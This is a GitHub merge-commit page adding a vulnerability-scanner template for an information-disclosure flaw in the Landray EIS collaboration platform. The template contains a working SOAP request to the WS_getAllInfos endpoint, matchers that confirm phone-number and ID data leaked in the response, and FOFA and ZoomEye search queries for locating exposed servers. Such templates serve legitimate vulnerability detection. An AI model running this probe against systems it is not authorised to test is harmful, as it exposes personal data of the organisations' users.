Merge pull request #9303 from HuTa0kj/feature/landray-eis-ws-getallinfos-disclosure

Add plugin: Landray EIS WS_getAllInfos Disclosure
patch-1
pussycat0x 2024-03-13 17:05:49 +05:30 committed by GitHub
commit 1466801e62
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 51 additions and 0 deletions

View File

@ -0,0 +1,51 @@
id: landray-eis-ws-infoleak
info:
name: Landray EIS WS_getAllInfos - Information Disclosure
author: Fur1na
severity: high
description: |
Landray EIS WS_getAllInfos interface suffers from a sensitive information disclosure vulnerability.
reference:
- https://mp.weixin.qq.com/s/CTLyriSSF-nQ8SUFv4RX0A
- https://github.com/akyosk/pocman/blob/main/cve/Lanling/Lanling_Info.py
metadata:
verified: true
max-request: 1
zoomeye-query: app:"蓝凌EIS智慧协同平台"
fofa-query: app="Landray-EIS智慧协同平台"
tags: landray,eis,info-leak
http:
- raw:
- |
POST /WS/Basic/Basic.asmx HTTP/1.1
Content-Type: text/xml
Host: {{Hostname}}
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:WS_getAllInfos/>
</soapenv:Body>
</soapenv:Envelope>
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<?xml"
- "WS_getAllInfosResponse"
- "CELL_PHONE_NUMBER"
- "UNID"
condition: and
- type: word
part: header
words:
- "Content-Type: text/xml"
- type: status
status:
- 200